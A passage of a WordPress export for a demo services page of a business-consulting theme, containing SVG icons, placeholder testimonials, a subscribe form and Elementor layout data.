		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M509.07,194.061L414.3,99.29c-3.906-3.905-10.24-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l87.697,87.696    l-51.274,51.273c-1.571,1.57-4.126,1.57-5.695,0l-101.25-101.249c-1.571-1.57-1.571-4.125,0-5.696l34.411-34.413    c3.906-3.906,3.906-10.24,0-14.147c-3.907-3.906-10.239-3.906-14.148,0l-34.411,34.411c-7.128,7.129-8.818,17.655-5.1,26.412    l-11.638,11.638h-44.877h-3.537h-32.955l-14.682-14.682c0.564-2.058,0.862-4.201,0.862-6.392c0-6.42-2.501-12.456-7.04-16.995    l-33.481-33.481c-3.907-3.906-10.239-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l33.482,33.481    c1.026,1.026,1.18,2.225,1.18,2.847s-0.153,1.821-1.181,2.848l-2.786,2.786l-98.495,98.471c-0.032,0.032-0.059,0.067-0.09,0.099    c-0.998,0.923-2.128,1.073-2.727,1.073c-0.623,0-1.822-0.153-2.848-1.179L24.15,201.114l88.876-88.875    c3.906-3.906,3.906-10.24,0-14.147s-10.238-3.906-14.148,0L2.93,194.041c-3.906,3.906-3.906,10.24,0,14.147l58.346,58.347    c4.687,4.686,10.841,7.028,16.995,7.028c2.826,0,5.646-0.518,8.329-1.507l32.843,32.843c-2.55,4.784-4,10.237-4,16.025    c0,18.853,15.338,34.191,34.191,34.191c0.042,0,0.084-0.003,0.126-0.003c0,0.002,0,0.004,0,0.006    c0,18.811,15.269,34.119,34.064,34.188c0,0.015-0.001,0.029-0.001,0.044c0,18.853,15.338,34.191,34.191,34.191    c5.8,0,11.265-1.456,16.055-4.015l12.227,12.227c5.732,5.732,13.354,8.889,21.46,8.889c8.107,0,15.729-3.157,21.46-8.889    c5.427-5.427,8.546-12.548,8.862-20.171c7.393-0.368,14.678-3.368,20.311-9.002c5.952-5.952,9.166-13.866,9.051-22.282    c0-0.018-0.001-0.035-0.001-0.053c8.703-0.54,16.71-4.354,22.63-10.805c5.951-6.482,8.896-14.656,8.87-22.81    c8.37-0.241,16.201-3.613,22.146-9.559c6.202-6.201,9.603-14.447,9.573-23.218c-0.017-5.164-1.229-10.132-3.49-14.608l32.81-30    c4.115,2.876,8.927,4.335,13.749,4.335c6.154,0,12.309-2.343,16.995-7.027l58.346-58.347    C512.976,204.301,512.976,197.967,509.07,194.061z M149.635,335.11c-7.822,0-14.185-6.363-14.185-14.185    c0-7.821,6.363-14.184,14.185-14.184c7.822,0,14.185,6.363,14.185,14.184C163.819,328.747,157.456,335.11,149.635,335.11z     M194.516,364.551c-0.407,0.386-0.804,0.781-1.192,1.186c-2.503,2.212-5.779,3.567-9.373,3.567    c-7.821,0-14.184-6.363-14.184-14.185s6.362-14.185,14.184-14.185s14.185,6.363,14.185,14.185    C198.135,358.743,196.758,362.042,194.516,364.551z M228.18,399.225c-0.046,0.044-0.095,0.082-0.14,0.127    c-0.05,0.05-0.091,0.104-0.139,0.154c-2.557,2.491-6.043,4.032-9.885,4.032c-7.823-0.002-14.186-6.365-14.186-14.186    c0-3.623,1.376-6.922,3.619-9.431c0.407-0.386,0.804-0.781,1.192-1.186c2.502-2.212,5.779-3.566,9.373-3.566    c7.821,0,14.185,6.363,14.185,14.185C232.199,393.19,230.663,396.669,228.18,399.225z M366.94,322.927    c-2.395,2.394-5.577,3.712-8.963,3.712s-6.568-1.318-8.963-3.711l-20.782-20.783c-3.906-3.906-10.238-3.906-14.148,0    c-3.906,3.906-3.906,10.24,0,14.147l20.781,20.782c0.001,0,0.002,0.001,0.002,0.001l0.063,0.063    c5.157,5.156,5.333,13.402,0.401,18.774c-2.478,2.7-5.859,4.257-9.522,4.385c-3.655,0.135-7.145-1.188-9.805-3.707l-20.011-18.942    c-4.013-3.798-10.344-3.625-14.142,0.388c-3.798,4.012-3.625,10.343,0.387,14.142l21.787,20.625    c2.157,2.042,3.367,4.802,3.408,7.772c0.041,2.97-1.093,5.762-3.193,7.862c-4.251,4.253-11.173,4.252-15.424,0l-10.101-10.101    c-3.907-3.906-10.239-3.906-14.148,0c-1.953,1.954-2.93,4.513-2.93,7.073s0.977,5.121,2.93,7.073l10.5,10.5    c1.954,1.954,3.03,4.551,3.03,7.313s-1.076,5.36-3.03,7.313c-1.954,1.954-4.551,3.029-7.313,3.029    c-2.763,0-5.359-1.076-7.313-3.03l-12.235-12.235c2.548-4.782,3.997-10.233,3.997-16.019c0-18.811-15.27-34.119-34.065-34.188    c0-0.015,0.001-0.029,0.001-0.044c0-18.853-15.338-34.191-34.191-34.191c-0.042,0-0.083,0.003-0.125,0.003    c0-0.002,0-0.004,0-0.006c0-18.853-15.338-34.19-34.191-34.19c-5.798,0-11.261,1.455-16.049,4.012l-31.265-31.264l88.44-88.441    l15.399,15.4c1.877,1.876,4.421,2.93,7.073,2.93h12.948l-39.486,39.486c-6.037,6.037-9.361,14.065-9.361,22.603    c0,8.538,3.324,16.565,9.361,22.602c6.037,6.038,14.065,9.362,22.603,9.362s16.566-3.325,22.603-9.362l33.491-33.492l36.665,0.402    l64.825,63.967c2.422,2.39,3.762,5.58,3.772,8.982C370.665,317.322,369.346,320.52,366.94,322.927z M374.169,284.024    l-60.938-60.131c-0.001-0.001-0.002-0.002-0.003-0.003l-0.088-0.087c-2.25-2.221-5.287-3.151-8.201-2.808l-43.539-0.477    c-2.7-0.02-5.28,1.027-7.183,2.929l-36.467,36.468c-2.259,2.259-5.262,3.502-8.455,3.502s-6.196-1.243-8.455-3.502    c-2.259-2.258-3.502-5.261-3.502-8.455c0-3.194,1.243-6.197,3.502-8.456l53.633-53.633h48.416c2.653,0,5.197-1.054,7.073-2.93    l13.328-13.328l82.237,82.237L374.169,284.024z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="438.336" cy="205.74" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="72.644" cy="206.74" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="131.064" cy="82.139" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="380.757" cy="81.338" r="9.983"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Support Functions</a></h5>				<p>Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M317.5,25.324H195.706c-18.813,0-34.118,15.305-34.118,34.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10V59.441    c0-7.784,6.333-14.117,14.118-14.117H317.5c7.785,0,14.118,6.333,14.118,14.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10    V59.441C351.618,40.628,336.313,25.324,317.5,25.324z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M463.178,106.118H48.822C21.901,106.118,0,128.019,0,154.94v88.801c0,4.433,2.919,8.337,7.171,9.592l6.093,1.797v209.488    c0,12.163,9.896,22.059,22.059,22.059h441.353c12.164,0,22.059-9.896,22.059-22.059V256.603l6.039-1.744    c4.279-1.236,7.226-5.153,7.226-9.607V154.94C512,128.019,490.099,106.118,463.178,106.118z M89.235,466.676H35.323    c-1.135,0-2.058-0.923-2.058-2.058v-53.912h28.76c15.004,0,27.21,12.207,27.21,27.21V466.676z M478.734,464.618    c0.001,1.135-0.922,2.058-2.058,2.058h-53.912v-28.76c0-15.004,12.207-27.21,27.21-27.21h28.76V464.618z M478.736,390.706h-0.001    h-28.76c-26.032,0-47.21,21.179-47.21,47.21v28.76h-293.53v-28.76c0-26.032-21.179-47.21-47.21-47.21h-28.76V261.029    L209.824,313.1v32.135c0,5.523,4.477,10,10,10h72.353c5.523,0,10-4.477,10-10v-31.868l176.559-50.988V390.706z M229.823,335.235    v-29.707c0-0.028,0-0.056,0-0.083V286.5h52.353v48.735H229.823z M492,237.731L302.176,292.55V276.5c0-5.523-4.477-10-10-10    h-72.353c-5.523,0-10,4.477-10,10v15.75L20,236.265V154.94c0-15.893,12.93-28.822,28.822-28.822h40.413v34.618    c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h289.912v34.618c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h44.031    c15.893,0,28.822,12.93,28.822,28.822V237.731z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="409.15" cy="199.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="99.23" cy="199.32" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Finance Planning</a></h5>				<p>We identify the mission, goals and strategic priorities of a business project or non-profit organization.</p>			
        			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/"class="link-details"> Learn More</a>
	        testimonials	        <h3>What People Say About Us</h3>	    
											<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Oliver Simson</h6>							client of company						
											<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Mary Grey</h6>							Manager						
											<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Samanta Fox</h6>							Designer						
										<img src="https://maxbizz.s3.amazonaws.com/images/04_Full_White.svg" alt="" loading="lazy" />											
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-corporate/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741" />
<input type="hidden" name="_wpcf7_version" value="5.3.2" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /><br />
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /><br />
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>885</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 10:16:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 10:16:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[services-with-icon]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"d5a76aa","elType":"section","settings":{"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"234f86e","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"1cf82f6","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"ce2318b","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"5510dd0","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"ef1670e","elType":"widget","settings":{"sub":"Improve Your Business","title":"We Offer Great<br> Number of Finance Services","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"9a1cf24","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"063a9d3","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"72f750e","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"849b54f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":648},"library":"svg"},"title":"Marketing Research","des":"Analysis of the market as a whole and its particular components (competitor, consumer, product, etc.)","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/marketing-research\/","is_external":"","nofollow":"","custom_attributes":""},"icon_bg":"#55BB5333","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"bg_hover_des_color":"#FFFFFF","bg_hover_box":"#061E2F"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"c431466","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"e0e8d01","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/rocket.svg","id":649},"library":"svg"},"title":"Organizational Audit","des":"Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":40,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""},"icon_bg":"#55BB5333","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"bg_hover_des_color":"#FFFFFF","bg_hover_box":"#061E2F"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"2269d28","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"56e56e3","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":1872},"library":"svg"},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""},"icon_bg":"#55BB5333","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"bg_hover_des_color":"#FFFFFF","bg_hover_box":"#061E2F"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"390869d","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"hide_desktop":"hidden-desktop","layout":"full_width"},"elements":[{"id":"075d0cf","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"4bdc329","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":1872},"library":"svg"},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""},"icon_bg":"#55BB5333","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"bg_hover_des_color":"#FFFFFF","bg_hover_box":"#061E2F"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"d45a6c2","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a93d254","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Project Management","des":"We are working in the format of an outsourcing project office. We assume operational coordination.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""},"icon_bg":"#55BB5333","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"bg_hover_des_color":"#FFFFFF","bg_hover_box":"#061E2F"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"41d2371","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_desktop":"hidden-desktop","hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[],"isInner":true}],"isInner":true},{"id":"a342583","elType":"section","settings":{"gap":"extended","structure":"30","background_background":"classic","layout":"full_width"},"elements":[{"id":"4685821","elType":"column","settings":{"_column_size":33,"_inline_size":null,"hide_tablet":"hidden-tablet","hide_mobile":"hidden-phone"},"elements":[{"id":"34b430f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Project Management","des":"We are working in the format of an outsourcing project office. We assume operational coordination.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""},"icon_bg":"#55BB5333","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"bg_hover_des_color":"#FFFFFF","bg_hover_box":"#061E2F"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"793fbd6","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"ed2b68f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/deal.svg","id":887},"library":"svg"},"title":"Support Functions","des":"Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":48,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""},"icon_bg":"#55BB5333","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"bg_hover_des_color":"#FFFFFF","bg_hover_box":"#061E2F"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"58be6ce","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"798624b","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/portfolio.svg","id":666},"library":"svg"},"title":"Finance Planning","des":"We identify the mission, goals and strategic priorities of a business project or non-profit organization.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""},"icon_bg":"#55BB5333","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"bg_hover_des_color":"#FFFFFF","bg_hover_box":"#061E2F"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"e92783c","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-icon.jpg","id":890},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"117","right":"0","bottom":"195","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"90","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false}},"elements":[{"id":"374524a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4de5108","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"f57a371","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"9728125","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"00c712c","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"2dd99d7","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"870bb75","elType":"section","settings":{"structure":"30","layout":"full_width"},"elements":[{"id":"40edabd","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true},{"id":"cfe5e81","elType":"column","settings":{"_column_size":33,"_inline_size":66.13200000000000500222085975110530853271484375},"elements":[{"id":"a078a65","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":2241},"tname":"Oliver Simson","tjob":"client of company","_id":"4b608b2"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"Manager","_id":"f2a510a"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"Designer","_id":"2012bf3"}],"arrows":"true","dots":"false","loop":"true","arrow_spacing":{"unit":"px","size":-127,"sizes":[]},"tcontent_color":"#616161"},"elements":[],"widgetType":"itestimonials2"}],"isInner":true},{"id":"79d9b22","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"dc04503","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"background_background":"classic","padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"3cb066f","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"76d32d2","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","background_background":"classic","background_color":"#55BB53","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"486b7c0","elType":"column","settings":{"_column_size":50,"_inline_size":18,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"b3ec411","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04_Full_White.svg","id":1956},"image_size":"full","align":"left","width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"6a16692","elType":"column","settings":{"_column_size":50,"_inline_size":82,"_inline_size_tablet":100},"elements":[{"id":"b62c98d","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[select_footer]]></wp:meta_key>
		<wp:meta_value><![CDATA[300]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
